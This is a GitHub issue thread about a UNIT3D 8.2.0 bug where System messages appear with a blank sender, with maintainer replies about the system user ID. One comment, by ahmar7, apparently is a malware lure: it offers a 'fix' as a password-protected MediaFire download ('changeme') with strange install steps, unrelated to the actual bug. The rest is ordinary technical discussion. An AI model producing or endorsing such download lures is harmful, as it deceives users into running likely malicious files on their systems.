### ISSUE TITLE
[Bug] System PM doesn't show up as being sent by System in user inbox

### ISSUE THREAD

**Issue by crKtv** [HDInnovations/UNIT3D-Community-Edition#4093]
### UNIT3D Version

8.2.0

### PHP & Platform

8.3.10 - Ubuntu 22.04

### Laravel verion

11.21.0

### Have you done this?

- [X] I am willing to share my stack trace and logs
- [ ] I can suggest a fix as a Pull Request

### Expectation

Messages being sent as System to show up as sent by System inside user's inbox

### Description

After I updated my custom fork to 8.2.0, I noticed that messages sent by System would show up as a blank sender in user's inbox. Thought that I messed up somewhere because of my modifications and fixed it in the frontend blade view to show up as System if a sender is not found - which isn't the best practice but couldn't find where it messes up in the backend.

Today, after Aither's mass PM, I noticed the same happened to them so I guess it is a bug. I didn't test with a fresh install as I'm with limited time and can't setup a fresh one.

Apologies in advance if you can't replicate it in a fresh install.

### Stack trace & logs

```shell
None - it doesn't throw any error
```

## Upvote & Fund

- We're using [Polar.sh](https://polar.sh/HDInnovations) so you can upvote and help fund this issue.
- We receive the funding once the issue is completed & confirmed by you.
- Thank you in advance for helping prioritize & fund our backlog.

<a href="https://polar.sh/HDInnovations/UNIT3D-Community-Edition/issues/4093">
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://polar.sh/api/github/HDInnovations/UNIT3D-Community-Edition/issues/4093/pledge.svg?darkmode=1">
  <img alt="Fund with Polar" src="https://polar.sh/api/github/HDInnovations/UNIT3D-Community-Edition/issues/4093/pledge.svg">
</picture>
</a>

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Roardom** [comment]
I've been working through a lot of the system user stuff over time, and have migrated most of the random `1`s and `'1'`s to a User::SYSTEM_USER_ID constant. By default, UNIT3D has a system id of 1. If your system user is not 1 (if you migrated from somewhere else for example), then you will likely need to update that constant to whatever id your system user has.

Otherwise, maybe make sure your system user is in a class that is immune from soft deletion? I can't seem to reproduce this bug locally.

**Comment by Roardom** [comment]
I see the issue now. Will send PR in a few.
